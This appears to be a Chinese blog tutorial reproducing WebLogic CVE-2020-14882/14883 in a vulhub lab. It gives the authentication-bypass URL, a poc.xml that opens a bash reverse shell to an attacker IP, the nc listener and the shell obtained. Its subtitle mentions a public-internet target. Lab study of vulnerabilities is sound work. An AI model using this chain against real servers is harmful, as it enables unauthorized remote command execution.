当前位置: 首页 > news >正文

WebLogic: CVE-2020-14882/14883【getshell】

记录第一次getshell公网设备

漏洞介绍

CVE-2020-14882:允许 未授权 的用户绕过管理控制台 (Console)的权限验证访问后台
CVE-2020-14883:允许后台任意用户通过HTTP协议 执行任意命令
使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令
漏洞原理:https://xz.aliyun.com/t/8470

环境搭建

1.进入靶场目录

cd /vulhub-master/weblogic/CVE-2020-14882

2.开启靶场【报错重启docker服务】


[root@localhost CVE-2020-14882]# docker-compose up -d

Starting cve-2020-14882_weblogic_1 ... done
 

3.查看靶场端口

[root@localhost CVE-2020-14882]# docker ps

CONTAINER ID   IMAGE                                             COMMAND                  CREATED         STATUS                           PORTS                                                          NAMES
480b96ac8c82   vulhub/weblogic:12.2.1.3-2018   "/u01/oracle/createA…"   2 minutes ago   Up About a minute   0.0.0.0:7001->7001/tcp, :::7001->7001/tcp   cve-2020-14882_weblogic_1
 

4. 访问靶场

http://192.168.10.5:7001/

漏洞利用

1. 输入网址查看是否存在未授权访问

http://192.168.10.5:7001/console/css/%252e%252e%252fconsole.port
al?_nfpb=true&_pageLabel=JmsSAFAgentSAFAgentTablePage&handle=co
m.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_d
omain%2CType%3DDomain%22%29
没有登录的情况下可直接进入后台

2.编写poc

poc.xml

<beans xmlns="http://www.springframework.org/schema/beans" 
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
       xsi:schemaLocation="http://www.springframework.org/schema/beans 
       http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>/bin/bash</value>
                <value>-c</value>
                <value><![CDATA[bash -i &> /dev/tcp/192.168.10.128/5555 0<&1]]></value>
            </list>
        </constructor-arg>
    </bean>
</beans>
 

3. 攻击机开启http服务并访问

┌──(root㉿kali)-[~]
└─# python -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...

4.监听本机 5555 端口

┌──(root㉿kali)-[~]
└─# nc -lvp 5555
listening on [any] 5555 ...
 

5.访问url

http://192.168.10.5:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://192.168.10.128:8888/poc.xml")

6.建立反弹链接

┌──(root㉿kali)-[~]
└─# nc -lvp 5555
listening on [any] 5555 ...
192.168.10.5: inverse host lookup failed: Unknown host
connect to [192.168.10.128] from (UNKNOWN) [192.168.10.5] 58624
bash: no job control in this shell
[oracle@480b96ac8c82 base_domain]$ ls
 

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • C语言自定义类型结构体与位段超详解
  • 如果一台Riscv FreeBSD系统没有pkg怎么办?
  • 基于深度学习的自动化模型设计
  • VS Code设置C++编译器路径
  • 《巴菲特的伯克希尔崛起》
  • 学Python可少不了项目练手,这8个小项目有趣又实用,小白也能做出来_python练手项目,python教程
  • 域环境的搭建 内网学习不会搭建环境???
  • 智慧水务项目(一)django(drf)+angular 18 通过pycharm建立项目
  • 计算机基础(Windows 10+Office 2016)教程 —— 第4章 计算机网络与Internet(上)
  • 十七、【人工智能】【机器学习】【非监督学习】- K-均值 (K-Means)
  • vue实现歌词滚动效果
  • HOW - 计时器实践和注意事项
  • RFID固定资产管理系统:提升企业资产管理效率的新利器
  • mybatisplus布隆过滤器解决缓存穿透
  • <数据集>棉花识别数据集<目标检测>
  • 收藏网友的 源程序下载网
  • fetch 从初识到应用
  • github从入门到放弃(1)
  • leetcode讲解--894. All Possible Full Binary Trees
  • linux学习笔记
  • MD5加密原理解析及OC版原理实现
  • React中的“虫洞”——Context
  • 基于HAProxy的高性能缓存服务器nuster
  • 基于webpack 的 vue 多页架构
  • 理解 C# 泛型接口中的协变与逆变(抗变)
  • 每天一个设计模式之命令模式
  • 前嗅ForeSpider中数据浏览界面介绍
  • 手机端车牌号码键盘的vue组件
  • 新版博客前端前瞻
  • “十年磨一剑”--有赞的HBase平台实践和应用之路 ...
  • Java总结 - String - 这篇请使劲喷我
  • postgresql行列转换函数
  • ​数据结构之初始二叉树(3)
  • ​一文看懂数据清洗:缺失值、异常值和重复值的处理
  • # Pytorch 中可以直接调用的Loss Functions总结:
  • #vue3 实现前端下载excel文件模板功能
  • (06)Hive——正则表达式
  • (done) NLP “bag-of-words“ 方法 (带有二元分类和多元分类两个例子)词袋模型、BoW
  • (创新)基于VMD-CNN-BiLSTM的电力负荷预测—代码+数据
  • (带教程)商业版SEO关键词按天计费系统:关键词排名优化、代理服务、手机自适应及搭建教程
  • (论文阅读31/100)Stacked hourglass networks for human pose estimation
  • (四)Controller接口控制器详解(三)
  • (算法)硬币问题
  • (转)Groupon前传:从10个月的失败作品修改,1个月找到成功
  • .net core 6 redis操作类
  • .net core使用ef 6
  • ::before和::after 常见的用法
  • ;号自动换行
  • ??在JSP中,java和JavaScript如何交互?
  • @TableId注解详细介绍 mybaits 实体类主键注解
  • [ vulhub漏洞复现篇 ] Hadoop-yarn-RPC 未授权访问漏洞复现
  • [asp.net core]project.json(2)
  • [AUTOSAR][诊断管理][ECU][$37] 请求退出传输。终止数据传输的(上传/下载)
  • [BZOJ] 2427: [HAOI2010]软件安装
  • [BZOJ3757] 苹果树